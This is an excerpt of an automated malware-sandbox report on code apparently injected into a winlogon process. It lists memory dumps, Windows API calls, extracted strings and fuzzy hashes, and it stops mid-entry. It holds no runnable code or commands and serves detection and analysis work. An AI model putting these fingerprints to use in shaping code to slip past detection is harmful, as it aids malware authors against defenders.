                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 45fd29a1b6800a1b48e2dad99402234d17b04da49f1f4772e7c302736c8b9013
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 1531B073A5270881FE13DB069810BE63398FF88BA9FA915249D1D5A794DA3EC44683C3
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B31
                                                  • GetLastError.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 913e52812023985531484c69a56f4c057774ccded8e0e9709dbdd399596a43e9
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 0731A333A5274881FE13DB069800BE53395BF44BA8FA98528AD2946794DE3BD54683C3
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B31
                                                  • GetLastError.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: e67ff9930da721277ed07b841fc38b7938dfad7609e3bd6cb6fbc50ffe571c68
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: C331B033A5674881FE139B429800FE53394FF44BA9F990624DD194B794EF3AC4448393
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 629538001b049afcf998d84a33afb03470eae8d162f95f7716f0bf9cb29571b7
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 99119333B54B4482F7528B52E854B5A76A0FBC8BE8F844214EE5D8BB94DF7AC40587C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 8aae48f47a9bb66e9edd86841ba13e019cb2a79eb4afd0458ea2895297c6a3c3
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 8511B132B54B4482F3528B52F854B5976A4FB88BE8F814214EA5D87B94CF3AC50187C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 05e9dde98ab0eb027feff401db16e6f2a0fc78696a85aafa316188426943b24b
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: AE119332B50B4482F7528B52E854B9976A0FB88BE8F844214EE5E87B94DF3AC50487C6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 3ffafa6e12e7f3b91adaa85c96a8f4b7dc5847d6796292c8cf60de481045626f
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 21D1EC37644B8C81EA71DB0AE49079A77A0FBC8B89F500112EACD577A5DF3DC542CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 813dea70fcca1b133d49793039452a6eb6565c05de3bdde15a2486de481bcc61
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: A1D1CA37644B8C81EA71DB0AE49079E77A0F788B89F504116EACD477A4CF3EC542CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 40abc1d1199b5cdc770a56a60e0e5f4e9b8051ed8e0c54cf7d7e0152ccf3fe8e
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 5651A332A81B4995FE07DB24D850AE933A1FF4474DFC40825A56C163A5EF76C52AC3E3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 8074ab1debeccdb7de81f9b6b17c497a6e832b8f613fb371d3e6f8c834ae6948
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 7D51C236A91B4995FA07DB28D851AD833A5FF4474CFC08819A52C063A5EF77C51AC3E3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: dd7d2fbe355015c765db1afd73c3d8f2591a8a07618d104dc6321a3fb9c50056
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 8751C372A81B4995FB07DB24D860AE433A1BF0474EFC40819A52D467A5FF7AC619C3E3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 49d9b1d556f3864c95b1a31ff4b7aec20a143fd073b71ee62d72c1b734a9cc42
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 20319233B45B5996F612DF169540AAA73A0FF84B89F8840208F4857755EF36C4A287C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 1920b0173048c2e31b506ed75283f2b7a4db50c395d0afa64895e5cbc0f95bca
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 6131A233B45B9982F612CF169540BA97391BF44B88F888028DF4807755EF3BD4A283C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 19b92fad8f820dd81a55a9e9a50199315003bb2ffc475f1c6e47e87a83ff1d46
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 2011B233E8434842F64667316505FFE3141BF85799FD84624A86A367DADE2AC40357C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: be797efc4d241fe522fb318c8b0c2a52a319cfeeeb0bbc57bc3f76715505c0c3
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 25118237E8435882F616A7316911BFE7241BF847A8FD4C628A926567DACE3BD40353C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: a72ea2f354f7ddfc3d159c3a9229b8853cee2434eedb132b01efaf94eb9f651b
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: 45115433F8134942FA166731A811BEE3153BF8479DFD84624A866563CADE3AD50183C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 981376d91bc599ae55fe3b6c15a14bb63b400c610608c7f00c9fc4e34d6b33a7
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: F9018B32B40B4486FA11CB12A848B9BB3A1FBC8FC8F8840349E4D47754DE39C986C3C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 8b86b7224197d8699fc3a6726de84bfb578e7bf873a1a615f1c4c61348878a40
